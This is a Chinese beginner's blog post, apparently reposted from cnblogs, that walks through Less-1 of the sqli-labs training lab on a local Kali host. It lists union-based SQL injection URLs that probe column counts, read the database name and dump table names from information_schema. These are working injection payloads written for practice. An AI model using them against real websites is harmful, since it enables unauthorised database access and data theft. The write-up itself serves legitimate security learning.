码迷,mamicode.com
首页 > 其他好文 > 详细

Less-1

时间:2021-03-05 13:16:18      阅读:0      评论:0      收藏:0      [点我收藏+]

标签:mamicode   limit   str   select   开始   sql注入   detail   看到了   tab   

萌新自学

sqli-labs搭建在kali下docker

kali的IP地址为192.168.3.131

 

技术图片

 

 

 进入后我们可以看到 Please input the ID as parameter with numeric value

 

输入:http://192.168.3.131/sqli-labs/Less-1/?id=1后可以看到

技术图片

 

 

 接着试着输入‘   即http://192.168.3.131/sqli-labs/Less-1/?id=1‘    可以看到我们输入的‘有SQL语法错误,可以判断有SQL注入点

技术图片

 

 

下面试试union联合注入,首先使用order by判断有几列  重order by 1开始一直到order by 3都是正常显示(order by 1表示第一列排序)

技术图片

 

在这里有一个疑惑不是很清楚:http://192.168.3.131/sqli-labs/Less-1/?id=1‘ order by 4--+

和http://192.168.3.131/sqli-labs/Less-1/?id=1‘ order by 4--d

输出的结果居然不一样,难道--不是注释符吗,后面的输入还有限制?

技术图片

 

 

查了一下果然有大佬写过https://blog.csdn.net/xiayun1995/article/details/86500605

 

好了现在我们知道有三列了,就可以开始

http://192.168.3.131/sqli-labs/Less-1/?id=-1‘ union select 1,2,3 --+  前面id=-1我们就能只看union后面查询的值了,因为前面查询为空

技术图片

 

 可以看到2和3的位置可以输出,使用database()函数查看当前库名

 

http://192.168.3.131/sqli-labs/Less-1/?id=-1‘ union select 1,database(),3 --+

技术图片

 

 

接下来爆表

http://192.168.3.131/sqli-labs/Less-1/?id=-1‘ union select 1,table_name,3 from information_schema.tables where table_schema=database() --+

技术图片

 

 

这里只输出了一张表, 之前输入?id=1‘时看到了语句 LIMIT 0,1

http://192.168.3.131/sqli-labs/Less-1/?id=-1‘ union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1 --+可以看到

技术图片

也能使用group_concat()函数,一行输出

http://192.168.3.131/sqli-labs/Less-1/?id=-1‘ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

技术图片

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Less-1

标签:mamicode   limit   str   select   开始   sql注入   detail   看到了   tab   

原文地址:https://www.cnblogs.com/caishu-xueqian/p/14483117.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!